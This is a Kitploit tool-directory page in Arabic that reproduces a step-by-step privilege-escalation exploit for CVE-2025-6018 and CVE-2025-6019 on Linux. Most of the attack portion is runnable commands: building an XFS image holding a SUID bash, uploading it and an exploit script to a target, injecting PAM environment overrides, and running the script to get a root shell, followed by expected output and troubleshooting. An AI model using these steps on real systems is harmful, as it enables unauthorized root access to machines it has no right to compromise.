Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit — استغلال تصعيد الامتيازات خطوة بخطوة لـ CVE-2025-6018 و CVE-2025-6019 باستخدام معالجة صور XFS وحقن متغيرات البيئة لـ PAM للحصول على وصول الجذر على أنظمة Linux. | Kitploit
أدوات/GitHubGitHub/ioxsec/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالفريق الأحمراستغلال الملفات الثنائية
GitHubioxsec/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit

CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit

استغلال تصعيد الامتيازات خطوة بخطوة لـ CVE-2025-6018 و CVE-2025-6019 باستخدام معالجة صور XFS وحقن متغيرات البيئة لـ PAM للحصول على وصول الجذر على أنظمة Linux.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

CVE-2025-6018 + CVE-2025-6019 دليل تصعيد الامتيازات

📋 خطوات الاستغلال السريعة

الخطوة 1: تحضير صورة XFS (الجهاز المحلي)

root@kitploit:~
# Create 300MB XFS image
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image

# Mount and install SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt

# Verify (should show 300M)
ls -lh xfs.image

الخطوة 2: رفع الملفات إلى الهدف

root@kitploit:~
# Upload exploit script and image
scp exp.sh [email protected]:~/
scp xfs.image [email protected]:~/

الخطوة 3: تسجيل الدخول الأول - تكوين PAM

root@kitploit:~
# SSH login to target
ssh [email protected]

# Write PAM environment variables
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF

# Verify configuration
cat ~/.pam_environment

# 🔥 Critical: Logout (to activate PAM config)
exit

الخطوة 4: تسجيل الدخول الثاني - تنفيذ تصعيد الامتيازات

root@kitploit:~
# Re-login via SSH (PAM config now active)
ssh [email protected]

# Verify PAM is active (should return "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
    --object-path /org/freedesktop/login1 \
    --method org.freedesktop.login1.Manager.CanReboot

# Execute privilege escalation script
bash exp.sh

✅ مؤشرات النجاح

إذا نجح الاستغلال، يجب أن ترى:

root@kitploit:~
✓ تم العثور على bash SUID: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ تم تأكيد الوصول كجذر!

════════════════════════════════════════════════════════════
║ علامة الجذر                                              ║
║ <ضع_العلم_هنا>                                          ║
════════════════════════════════════════════════════════════

bash-5.2# whoami
root

🔧 استكشاف الأخطاء وإصلاحها

المشكلةالحل
CanReboot تُرجع ('no',)

📌 نقاط رئيسية

  • ✅ يجب تسجيل الخروج وإعادة الدخول: تكوين PAM يسري فقط في الجلسات الجديدة
  • ✅ تحقق من CanReboot: تأكد من أنه يُرجع ('yes',) قبل تشغيل السكربت
  • ✅ استخدم تسجيل الدخول SSH: لا تستخدم تنفيذ الأسلوب ssh -t user@host "cmd"

🐱 الحارس القط

إذا فشلت، تأكد من تنفيذ كل خطوة بالترتيب بدقة!

تنزيل الأداة
تأكد من أنك قد سجلت الخروج والعودة (الخطوة 3)
خطأ Not authorizedتحقق من أن محتوى ~/.pam_environment صحيح
لم يتم العثور على bash SUIDأعد رفع xfs.image وتحقق من تعيين بت SUID